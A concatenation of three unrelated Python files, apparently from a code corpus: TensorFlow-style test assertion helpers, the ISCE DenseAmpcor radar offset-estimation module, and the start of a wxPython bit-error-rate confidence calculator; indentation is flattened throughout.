def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays have near values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
rtol: relative tolerance
atol: absolute tolerance
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.abs(a - b) > atol + rtol * np.abs(b)
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
      a: a numpy ndarray or anything that can be converted to one.
      b: a numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(
a.shape, b.shape,
"Shape mismatch: expected %s, got %s." % (a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in OpError exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
errors.OpError exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message
op = e.op
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError(e)
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `Device` object.
device2: A string device name or TensorFlow `Device` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
|
DenseAmpcor.py
|
#! /usr/bin/env python
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Copyright 2014 California Institute of Technology. ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# United States Government Sponsorship acknowledged. This software is subject to
# U.S. export control laws and regulations and has been classified as 'EAR99 NLR'
# (No [Export] License Required except when exporting to an embargoed country,
# end user, or in support of a prohibited end use). By downloading this software,
# the user agrees to comply with all applicable U.S. export laws and regulations.
# The user has the responsibility to obtain export licenses, or other export
# authority as may be required before exporting this software to any 'EAR99'
# embargoed foreign country or citizen of those countries.
#
# Author: Brent Minchew
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from __future__ import print_function
import sys
import os
import math
import isceobj
from isceobj.Location.Offset import OffsetField,Offset
from iscesys.Component.Component import Component,Port
from iscesys.Compatibility import Compatibility
Compatibility.checkPythonVersion()
from iscesys.StdOEL.StdOELPy import create_writer
from .Ampcor import Ampcor
from isceobj.Util.mathModule import is_power2
import logging
import numpy as np
import multiprocessing as mp
from iscesys.ImageUtil.ImageUtil import ImageUtil as IU
from isceobj.Util.decorators import use_api
def getThreadCount():
'''
Return number of threads available.
'''
cpus = os.cpu_count()
try:
ompnum = int(os.environ['OMP_NUM_THREADS'])
except KeyError:
ompnum = None
if ompnum is None:
return cpus
else:
return ompnum
def intround(n):
if (n <= 0):
return int(n-0.5)
else:
return int(n+0.5)
logger = logging.getLogger('mroipac.ampcor.denseampcor')
WINDOW_SIZE_WIDTH = Component.Parameter('windowSizeWidth',
public_name='WINDOW_SIZE_WIDTH',
default = 64,
type = int,
mandatory = False,
doc = 'Width of the reference data window to be used for correlation')
WINDOW_SIZE_HEIGHT = Component.Parameter('windowSizeHeight',
public_name='WINDOW_SIZE_HEIGHT',
default = 64,
type = int,
mandatory = False,
doc = 'Height of the reference data window to be used for correlation')
SEARCH_WINDOW_SIZE_WIDTH = Component.Parameter('searchWindowSizeWidth',
public_name='SEARCH_WINDOW_SIZE_WIDTH',
default = 100,
type = int,
mandatory = False,
doc = 'Width of the search data window to be used for correlation')
SEARCH_WINDOW_SIZE_HEIGHT = Component.Parameter('searchWindowSizeHeight',
public_name='SEARCH_WINDOW_SIZE_HEIGHT',
default = 100,
type = int,
mandatory = False,
doc = 'Height of the search data window to be used for correlation')
ZOOM_WINDOW_SIZE = Component.Parameter('zoomWindowSize',
public_name = 'ZOOM_WINDOW_SIZE',
default = 16,
type = int,
mandatory = False,
doc = 'Zoom window around the local maximum for first pass')
OVERSAMPLING_FACTOR = Component.Parameter('oversamplingFactor',
public_name = 'OVERSAMPLING_FACTOR',
default = 16,
type = int,
mandatory = False,
doc = 'Oversampling factor for the FFTs to get sub-pixel shift.')
ACROSS_GROSS_OFFSET = Component.Parameter('acrossGrossOffset',
public_name = 'ACROSS_GROSS_OFFSET',
default = None,
type = int,
mandatory = False,
doc = 'Gross offset in the range direction.')
DOWN_GROSS_OFFSET = Component.Parameter('downGrossOffset',
public_name = 'DOWN_GROSS_OFFSET',
default = None,
type = int,
mandatory = False,
doc = 'Gross offset in the azimuth direction.')
ACROSS_LOOKS = Component.Parameter('acrossLooks',
public_name = 'ACROSS_LOOKS',
default = 1,
type = int,
mandatory = False,
doc = 'Number of looks to take in range before correlation')
DOWN_LOOKS = Component.Parameter('downLooks',
public_name = 'DOWN_LOOKS',
default = 1,
type = int,
mandatory = False,
doc = 'Number of looks to take in azimuth before correlation')
SKIP_SAMPLE_ACROSS = Component.Parameter('skipSampleAcross',
public_name = 'SKIP_SAMPLE_ACROSS',
default = None,
type = int,
mandatory = False,
doc = 'Number of samples to skip in range direction')
SKIP_SAMPLE_DOWN = Component.Parameter('skipSampleDown',
public_name = 'SKIP_SAMPLE_DOWN',
default = None,
type = int,
mandatory = False,
        doc = 'Number of lines to skip in azimuth direction')
DOWN_SPACING_PRF1 = Component.Parameter('prf1',
public_name = 'DOWN_SPACING_PRF1',
default = 1.0,
type = float,
mandatory = False,
doc = 'PRF or a similar scale factor for azimuth spacing of reference image.')
DOWN_SPACING_PRF2 = Component.Parameter('prf2',
public_name = 'DOWN_SPACING_PRF2',
default = 1.0,
type = float,
mandatory = False,
doc = 'PRF or a similar scale factor for azimuth spacing of search image.')
ACROSS_SPACING1 = Component.Parameter('rangeSpacing1',
public_name = 'ACROSS_SPACING1',
default = 1.0,
type = float,
mandatory = False,
doc = 'Range pixel spacing or similar scale factor for reference image.')
ACROSS_SPACING2 = Component.Parameter('rangeSpacing2',
public_name = 'ACROSS_SPACING2',
default = 1.0,
type = float,
mandatory = False,
doc = 'Range pixel spacing or similar scale for search image.')
IMAGE_DATATYPE1 = Component.Parameter('imageDataType1',
public_name = 'IMAGE_DATATYPE1',
default='',
type = str,
mandatory = False,
doc = 'Image data type for reference image (complex / real/ mag)')
IMAGE_DATATYPE2 = Component.Parameter('imageDataType2',
public_name = 'IMAGE_DATATYPE2',
default='',
type = str,
mandatory=False,
doc = 'Image data type for search image (complex / real/ mag)')
IMAGE_SCALING_FACTOR = Component.Parameter('scaling_factor',
public_name = 'IMAGE_SCALING_FACTOR',
default = 1.0,
type = float,
mandatory=False,
doc = 'Image data scaling factor (unit magnitude conversion from pixels)')
SNR_THRESHOLD = Component.Parameter('thresholdSNR',
public_name = 'SNR_THRESHOLD',
default = 0.0,
type = float,
mandatory=False,
doc = 'SNR threshold for valid matches.')
COV_THRESHOLD = Component.Parameter('thresholdCov',
public_name = 'COV_THRESHOLD',
default = 1000.0,
type = float,
mandatory=False,
doc = 'Covariance threshold for valid matches.')
BAND1 = Component.Parameter('band1',
public_name='BAND1',
default=0,
type = int,
mandatory = False,
doc = 'Band number of image1')
BAND2 = Component.Parameter('band2',
public_name='BAND2',
default=0,
type=int,
mandatory=False,
doc = 'Band number of image2')
OFFSET_IMAGE_NAME = Component.Parameter('offsetImageName',
public_name='OFFSET_IMAGE_NAME',
default='dense_ampcor.bil',
type=str,
mandatory=False,
doc = 'File name for two channel output')
SNR_IMAGE_NAME = Component.Parameter('snrImageName',
public_name = 'SNR_IMAGE_NAME',
default = 'dense_ampcor_snr.bil',
type=str,
mandatory=False,
doc = 'File name for output SNR')
MARGIN = Component.Parameter('margin',
public_name = 'MARGIN',
default = 50,
type = int,
mandatory=False,
doc = 'Margin around the edge of the image to avoid')
NUMBER_THREADS = Component.Parameter('numberThreads',
public_name = 'NUMBER_THREADS',
default=getThreadCount(),
type=int,
mandatory=False,
doc = 'Number of parallel ampcor threads to launch')
class DenseAmpcor(Component):
family = 'denseampcor'
logging_name = 'isce.mroipac.denseampcor'
parameter_list = (WINDOW_SIZE_WIDTH,
WINDOW_SIZE_HEIGHT,
SEARCH_WINDOW_SIZE_WIDTH,
SEARCH_WINDOW_SIZE_HEIGHT,
ZOOM_WINDOW_SIZE,
OVERSAMPLING_FACTOR,
ACROSS_GROSS_OFFSET,
DOWN_GROSS_OFFSET,
ACROSS_LOOKS,
DOWN_LOOKS,
SKIP_SAMPLE_ACROSS,
SKIP_SAMPLE_DOWN,
DOWN_SPACING_PRF1,
DOWN_SPACING_PRF2,
ACROSS_SPACING1,
ACROSS_SPACING2,
IMAGE_DATATYPE1,
IMAGE_DATATYPE2,
IMAGE_SCALING_FACTOR,
SNR_THRESHOLD,
COV_THRESHOLD,
BAND1,
BAND2,
OFFSET_IMAGE_NAME,
SNR_IMAGE_NAME,
MARGIN,
NUMBER_THREADS)
@use_api
def denseampcor(self,slcImage1 = None,slcImage2 = None):
        if slcImage1 is not None:
            self.slcImage1 = slcImage1
        if self.slcImage1 is None:
            logger.error("Error. master slc image not set.")
            raise Exception
        if slcImage2 is not None:
            self.slcImage2 = slcImage2
        if self.slcImage2 is None:
            logger.error("Error. slave slc image not set.")
            raise Exception
self.fileLength1 = self.slcImage1.getLength()
self.lineLength1 = self.slcImage1.getWidth()
self.fileLength2 = self.slcImage2.getLength()
self.lineLength2 = self.slcImage2.getWidth()
####Run checks
self.checkTypes()
self.checkWindows()
####Actual processing
coarseAcross = self.acrossGrossOffset
coarseDown = self.downGrossOffset
xMargin = 2*self.searchWindowSizeWidth + self.windowSizeWidth
yMargin = 2*self.searchWindowSizeHeight + self.windowSizeHeight
#####Set image limits for search
offAc = max(self.margin,-coarseAcross)+xMargin
if offAc % self.skipSampleAcross != 0:
leftlim = offAc
offAc = self.skipSampleAcross*(1 + int(offAc/self.skipSampleAcross)) - self.pixLocOffAc
while offAc < leftlim:
offAc += self.skipSampleAcross
offDn = max(self.margin,-coarseDown)+yMargin
if offDn % self.skipSampleDown != 0:
toplim = offDn
offDn = self.skipSampleDown*(1 + int(offDn/self.skipSampleDown)) - self.pixLocOffDn
while offDn < toplim:
offDn += self.skipSampleDown
offAcmax = int(coarseAcross + ((self.rangeSpacing1/self.rangeSpacing2)-1)*self.lineLength1)
lastAc = int(min(self.lineLength1, self.lineLength2-offAcmax) - xMargin -1 - self.margin)
offDnmax = int(coarseDown + ((self.prf2/self.prf1)-1)*self.fileLength1)
lastDn = int(min(self.fileLength1, self.fileLength2-offDnmax) - yMargin -1 - self.margin)
self.gridLocAcross = range(offAc + self.pixLocOffAc, lastAc - self.pixLocOffAc, self.skipSampleAcross)
self.gridLocDown = range(offDn + self.pixLocOffDn, lastDn - self.pixLocOffDn, self.skipSampleDown)
startAc, endAc = offAc, self.gridLocAcross[-1] - self.pixLocOffAc
self.numLocationAcross = int((endAc-startAc)/self.skipSampleAcross + 1)
self.numLocationDown = len(self.gridLocDown)
self.offsetCols, self.offsetLines = self.numLocationAcross, self.numLocationDown
print('Pixels: ', self.lineLength1, self.lineLength2)
print('Lines: ', self.fileLength1, self.fileLength2)
print('Wins : ', self.windowSizeWidth, self.windowSizeHeight)
print('Srch: ', self.searchWindowSizeWidth, self.searchWindowSizeHeight)
#####Create shared memory objects
numlen = self.numLocationAcross * self.numLocationDown
self.locationDown = np.frombuffer(mp.Array('i', numlen).get_obj(), dtype='i')
self.locationDownOffset = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.locationAcross = np.frombuffer(mp.Array('i', numlen).get_obj(), dtype='i')
self.locationAcrossOffset = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.snr = np.frombuffer(mp.Array('f', numlen).get_obj(), dtype='f')
self.locationDownOffset[:] = -10000.0
self.locationAcrossOffset[:] = -10000.0
self.snr[:] = 0.0
###run ampcor on parallel processes
threads = []
nominal_load = self.numLocationDown // self.numberThreads
flat_indices = np.arange(numlen).reshape((self.numLocationDown,self.numLocationAcross))
ofmt = 'Thread %d: %7d%7d%7d%7d%7d%7d'
for thrd in range(self.numberThreads):
# Determine location down grid indices for thread
if thrd == self.numberThreads - 1:
proc_num_grid = self.numLocationDown - thrd * nominal_load
else:
proc_num_grid = nominal_load
istart = thrd * nominal_load
iend = istart + proc_num_grid
# Compute corresponding global line/down indices
proc_loc_down = self.gridLocDown[istart:iend]
startDown, endDown = proc_loc_down[0], proc_loc_down[-1]
numDown = int((endDown - startDown)//self.skipSampleDown + 1)
# Get flattened grid indices
firstind = flat_indices[istart:iend,:].ravel()[0]
lastind = flat_indices[istart:iend,:].ravel()[-1]
print(ofmt % (thrd, firstind, lastind, startAc, endAc, startDown, endDown))
# Launch job
args = (startAc,endAc,startDown,endDown,self.numLocationAcross,
numDown,firstind,lastind)
threads.append(mp.Process(target=self._run_ampcor, args=args))
threads[-1].start()
# Wait for all threads to finish
for thread in threads:
thread.join()
self.firstSampAc, self.firstSampDown = self.locationAcross[0], self.locationDown[0]
self.lastSampAc, self.lastSampDown = self.locationAcross[-1], self.locationDown[-1]
#### Scale images (default is 1.0 to keep as pixel)
self.locationDownOffset *= self.scaling_factor
self.locationAcrossOffset *= self.scaling_factor
self.snr *= self.scaling_factor
self.write_slantrange_images()
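    # Hedged illustration of the partitioning above (numbers are made up): with
    # numLocationDown = 10 grid rows and numberThreads = 3, nominal_load is
    # 10 // 3 = 3, so the first two processes take rows [0:3] and [3:6] while
    # the last one absorbs the remainder, rows [6:10]. Each child writes into a
    # disjoint slice of the shared locationDown/locationAcross/snr buffers, so
    # no locking is needed beyond the final join().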
def _run_ampcor(self, firstAc, lastAc, firstDn, lastDn,
numAc, numDn, firstind, lastind):
'''
Individual calls to ampcor.
'''
os.environ['VRT_SHARED_SOURCE'] = "0"
objAmpcor = Ampcor()
objAmpcor.setWindowSizeWidth(self.windowSizeWidth)
objAmpcor.setWindowSizeHeight(self.windowSizeHeight)
objAmpcor.setSearchWindowSizeWidth(self.searchWindowSizeWidth)
objAmpcor.setSearchWindowSizeHeight(self.searchWindowSizeHeight)
objAmpcor.setImageDataType1(self.imageDataType1)
objAmpcor.setImageDataType2(self.imageDataType2)
objAmpcor.setFirstSampleAcross(firstAc)
objAmpcor.setLastSampleAcross(lastAc)
objAmpcor.setNumberLocationAcross(numAc)
objAmpcor.setFirstSampleDown(firstDn)
objAmpcor.setLastSampleDown(lastDn)
objAmpcor.setNumberLocationDown(numDn)
objAmpcor.setAcrossGrossOffset(self.acrossGrossOffset)
objAmpcor.setDownGrossOffset(self.downGrossOffset)
objAmpcor.setFirstPRF(self.prf1)
objAmpcor.setSecondPRF(self.prf2)
objAmpcor.setFirstRangeSpacing(self.rangeSpacing1)
objAmpcor.setSecondRangeSpacing(self.rangeSpacing2)
objAmpcor.thresholdSNR = 1.0e-6
objAmpcor.thresholdCov = self.thresholdCov
objAmpcor.oversamplingFactor = self.oversamplingFactor
mSlc = isceobj.createImage()
IU.copyAttributes(self.slcImage1, mSlc)
mSlc.setAccessMode('read')
mSlc.createImage()
sSlc = isceobj.createImage()
IU.copyAttributes(self.slcImage2, sSlc)
sSlc.setAccessMode('read')
sSlc.createImage()
objAmpcor.ampcor(mSlc, sSlc)
mSlc.finalizeImage()
sSlc.finalizeImage()
j = 0
length = len(objAmpcor.locationDown)
for i in range(lastind-firstind):
acInd = firstAc + self.pixLocOffAc + (i % numAc)*self.skipSampleAcross
downInd = firstDn + self.pixLocOffDn + (i//numAc)*self.skipSampleDown
if j < length and objAmpcor.locationDown[j] == downInd and objAmpcor.locationAcross[j] == acInd:
self.locationDown[firstind+i] = objAmpcor.locationDown[j]
self.locationDownOffset[firstind+i] = objAmpcor.locationDownOffset[j]
self.locationAcross[firstind+i] = objAmpcor.locationAcross[j]
self.locationAcrossOffset[firstind+i] = objAmpcor.locationAcrossOffset[j]
self.snr[firstind+i] = objAmpcor.snrRet[j]
j += 1
else:
self.locationDown[firstind+i] = downInd
self.locationDownOffset[firstind+i] = -10000.
self.locationAcross[firstind+i] = acInd
self.locationAcrossOffset[firstind+i] = -10000.
self.snr[firstind+i] = 0.
return
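    # Hedged note on the copy-back loop above: ampcor only reports the grid
    # points it could match, so the loop walks the full firstind..lastind
    # range, copies a returned value whenever the expected (acInd, downInd)
    # pair is present, and otherwise stores the grid location together with
    # the -10000./0. fill values that mark a failed match.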
def write_slantrange_images(self):
'''Write output images'''
        ####Ensure everything is a 2D image first
if self.locationDownOffset.ndim == 1:
self.locationDownOffset = self.locationDownOffset.reshape(-1,self.offsetCols)
if self.locationAcrossOffset.ndim == 1:
self.locationAcrossOffset = self.locationAcrossOffset.reshape(-1,self.offsetCols)
if self.snr.ndim == 1:
self.snr = self.snr.reshape(-1,self.offsetCols)
if self.locationDown.ndim == 1:
self.locationDown = self.locationDown.reshape(-1,self.offsetCols)
if self.locationAcross.ndim == 1:
self.locationAcross = self.locationAcross.reshape(-1,self.offsetCols)
outdata = np.empty((2*self.offsetLines, self.offsetCols), dtype=np.float32)
outdata[::2,:] = self.locationDownOffset
outdata[1::2,:] = self.locationAcrossOffset
outdata.tofile(self.offsetImageName)
del outdata
outImg = isceobj.createImage()
outImg.setDataType('FLOAT')
outImg.setFilename(self.offsetImageName)
outImg.setBands(2)
outImg.scheme = 'BIL'
outImg.setWidth(self.offsetCols)
outImg.setLength(self.offsetLines)
outImg.setAccessMode('read')
outImg.renderHdr()
####Create SNR image
self.snr.astype(np.float32).tofile(self.snrImageName)
snrImg = isceobj.createImage()
snrImg.setFilename(self.snrImageName)
snrImg.setDataType('FLOAT')
snrImg.setBands(1)
snrImg.setWidth(self.offsetCols)
snrImg.setLength(self.offsetLines)
snrImg.setAccessMode('read')
snrImg.renderHdr()
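    # Hedged reading of the layout written above (follows from the BIL scheme
    # set on outImg): interleaving outdata[::2] = down offsets and
    # outdata[1::2] = across offsets emits one line of band 1 followed by one
    # line of band 2 for every output row, i.e. band-interleaved-by-line order
    # for a two-band float32 image that is offsetCols pixels wide.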
def checkTypes(self):
'''Check if the image datatypes are set.'''
if self.imageDataType1 == '':
if self.slcImage1.getDataType().upper().startswith('C'):
self.imageDataType1 = 'complex'
else:
raise ValueError('Undefined value for imageDataType1. Should be complex/real/mag')
else:
if self.imageDataType1 not in ('complex','real','mag'):
                raise ValueError('ImageDataType1 should be either complex/real/mag.')
if self.imageDataType2 == '':
if self.slcImage2.getDataType().upper().startswith('C'):
self.imageDataType2 = 'complex'
else:
raise ValueError('Undefined value for imageDataType2. Should be complex/real/mag')
else:
if self.imageDataType2 not in ('complex','real','mag'):
                raise ValueError('ImageDataType2 should be either complex/real/mag.')
def checkWindows(self):
'''Ensure that the window sizes are valid for the code to work.'''
if (self.windowSizeWidth%2 == 1):
raise ValueError('Window size width needs to be an even number.')
if (self.windowSizeHeight%2 == 1):
raise ValueError('Window size height needs to be an even number.')
if not is_power2(self.zoomWindowSize):
raise ValueError('Zoom window size needs to be a power of 2.')
if not is_power2(self.oversamplingFactor):
raise ValueError('Oversampling factor needs to be a power of 2.')
if self.searchWindowSizeWidth >= 2*self.windowSizeWidth :
raise ValueError('Search Window Size Width should be < 2 * Window Size Width')
if self.searchWindowSizeHeight >= 2*self.windowSizeHeight :
raise ValueError('Search Window Size Height should be < 2 * Window Size Height')
if self.zoomWindowSize >= min(self.searchWindowSizeWidth, self.searchWindowSizeHeight):
raise ValueError('Zoom window size should be <= Search window size')
if self._stdWriter is None:
self._stdWriter = create_writer("log", "", True, filename="denseampcor.log")
self.pixLocOffAc = self.windowSizeWidth//2 + self.searchWindowSizeWidth - 1
self.pixLocOffDn = self.windowSizeHeight//2 + self.searchWindowSizeHeight - 1
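    # Hedged worked example (values are illustrative, not from the source):
    # with windowSizeWidth = 64 and searchWindowSizeWidth = 20, pixLocOffAc is
    # 64 // 2 + 20 - 1 = 51; denseampcor() adds this to offAc/offDn when
    # building gridLocAcross/gridLocDown, shifting each grid location from the
    # start of a chip toward the pixel whose offset is actually estimated.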
def setImageDataType1(self, var):
self.imageDataType1 = str(var)
return
def setImageDataType2(self, var):
self.imageDataType2 = str(var)
return
def setImageScalingFactor(self, var):
self.scaling_factor = float(var)
return
def setLineLength1(self,var):
self.lineLength1 = int(var)
return
def setLineLength2(self, var):
        self.lineLength2 = int(var)
return
def setFileLength1(self,var):
self.fileLength1 = int(var)
return
def setFileLength2(self, var):
self.fileLength2 = int(var)
def setSkipSampleAcross(self,var):
self.skipSampleAcross = int(var)
return
def setSkipSampleDown(self,var):
self.skipSampleDown = int(var)
return
def setAcrossGrossOffset(self,var):
self.acrossGrossOffset = int(var)
return
def setDownGrossOffset(self,var):
self.downGrossOffset = int(var)
return
def setFirstPRF(self,var):
self.prf1 = float(var)
return
def setSecondPRF(self,var):
self.prf2 = float(var)
return
def setFirstRangeSpacing(self,var):
self.rangeSpacing1 = float(var)
return
def setSecondRangeSpacing(self,var):
self.rangeSpacing2 = float(var)
def setMasterSlcImage(self,im):
self.slcImage1 = im
return
def setSlaveSlcImage(self,im):
self.slcImage2 = im
return
def setWindowSizeWidth(self, var):
temp = int(var)
if (temp%2 == 1):
raise ValueError('Window width needs to be an even number.')
self.windowSizeWidth = temp
return
def setWindowSizeHeight(self, var):
temp = int(var)
if (temp%2 == 1):
raise ValueError('Window height needs to be an even number.')
self.windowSizeHeight = temp
return
def setZoomWindowSize(self, var):
temp = int(var)
if not is_power2(temp):
raise ValueError('Zoom window size needs to be a power of 2.')
self.zoomWindowSize = temp
def setOversamplingFactor(self, var):
temp = int(var)
if not is_power2(temp):
raise ValueError('Oversampling factor needs to be a power of 2.')
self.oversamplingFactor = temp
def setSearchWindowSizeWidth(self, var):
self.searchWindowSizeWidth = int(var)
return
def setSearchWindowSizeHeight(self, var):
self.searchWindowSizeHeight = int(var)
return
def setAcrossLooks(self, var):
self.acrossLooks = int(var)
return
def setDownLooks(self, var):
self.downLooks = int(var)
return
def stdWriter(self, var):
self._stdWriter = var
return
def __init__(self, name=''):
super(DenseAmpcor, self).__init__(family=self.__class__.family, name=name)
self.locationAcross = []
self.locationAcrossOffset = []
self.locationDown = []
self.locationDownOffset = []
self.snrRet = []
self.cov1Ret = []
self.cov2Ret = []
self.cov3Ret = []
self.lineLength1 = None
self.lineLength2 = None
self.fileLength1 = None
self.fileLength2 = None
self.scaleFactorX = None
self.scaleFactorY = None
self.firstSampAc = None
self.lastSampAc = None
self.firstSampDown = None
self.lastSampDown = None
self.numLocationAcross = None
self.numLocationDown = None
self.offsetCols = None
self.offsetLines = None
self.gridLocAcross = None
self.gridLocDown = None
self.pixLocOffAc = None
self.pixLocOffDn = None
self._stdWriter = None
self.offsetLines = None
self.offsetCols = None
self.dictionaryOfVariables = { \
'IMAGETYPE1' : ['imageDataType1', 'str', 'optional'], \
'IMAGETYPE2' : ['imageDataType2', 'str', 'optional'], \
'IMAGE_SCALING_FACTOR' : ['scaling_factor', 'float', 'optional'], \
'SKIP_SAMPLE_ACROSS' : ['skipSampleAcross', 'int','mandatory'], \
'SKIP_SAMPLE_DOWN' : ['skipSampleDown', 'int','mandatory'], \
'COARSE_NUMBER_LOCATION_ACROSS' : ['coarseNumWinAcross','int','mandatory'], \
'COARSE_NUMBER_LOCATION_DOWN' : ['coarseNumWinDown', 'int', 'mandatory'], \
'ACROSS_GROSS_OFFSET' : ['acrossGrossOffset', 'int','optional'], \
'DOWN_GROSS_OFFSET' : ['downGrossOffset', 'int','optional'], \
'PRF1' : ['prf1', 'float','optional'], \
'PRF2' : ['prf2', 'float','optional'], \
'RANGE_SPACING1' : ['rangeSpacing1', 'float', 'optional'], \
'RANGE_SPACING2' : ['rangeSpacing2', 'float', 'optional'], \
}
self.dictionaryOfOutputVariables = {
'FIRST_SAMPLE_ACROSS' : 'firstSampAc',
            'FIRST_SAMPLE_DOWN' : 'firstSampDown',
'NUMBER_LINES': 'offsetLines',
'NUMBER_PIXELS' : 'offsetCols'}
return None
#end class
if __name__ == "__main__":
sys.exit(main())
|
BER_confidence_level_calculator_v0p2.py
|
#!python3
# -*- coding: utf-8 -*-
"""
@author: yanbin
Any suggestions? Please contact yanbin_c@hotmail.com
"""
import os
import wx
import sys
import time,datetime
import numpy as np
import math
from threading import Thread
from wx.lib.embeddedimage import PyEmbeddedImage
class MyFrame(wx.Frame):
def __init__(self):
wx.Frame.__init__(self,None,-1,'BER Confidence Level Calculator V0.2',size=(600,400))
nb_main=wx.Notebook(self,-1,pos=(0,0),size=(600,400),style=wx.BK_DEFAULT)
self.panel_c=panel_Calculator(nb_main,-1)
self.panel_v=panel_version(nb_main,-1)
nb_main.AddPage(self.panel_c,"BER Cal")
nb_main.AddPage(self.panel_v,"Version")
self.panel_c.btn_run.Bind(wx.EVT_BUTTON,self.On_Run)
def On_Run(self, event):
thread = Thread(target = self.On_Run_cal, args = (), name = self.On_Run_cal.__name__)
thread.start()
def On_Run_cal(self):
basic_setting=self.panel_c.get_setting()
bers=float(basic_setting["BER"])
bps=float(basic_setting["BPS"])
t=float(basic_setting["T"])
error=int(basic_setting["E"])
unit_list=(1,60,3600)
unit=unit_list[int(basic_setting["U"]) ]
p=0
N=bps*unit*t
for i in range (error+1):
p+=math.pow(N*bers,i)/math.factorial(i)
Pnk=math.exp(-N*bers)*p
CL=1-Pnk
self.panel_c.txt_N.SetValue (str(N))
self.panel_c.txt_CL.SetValue (str(CL*100))
        print('\n\n\t*** Calculation done. ***')
        return
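# Hedged reference sketch (not wired into the GUI above; the helper name
# ber_confidence_level is an assumption for illustration): On_Run_cal evaluates
# the Poisson-based confidence level
#     CL = 1 - exp(-N*BER) * sum_{k=0}^{E} (N*BER)^k / k!
# where N = BPS * T is the number of transmitted bits and E the number of
# observed errors. The same computation as a standalone function:
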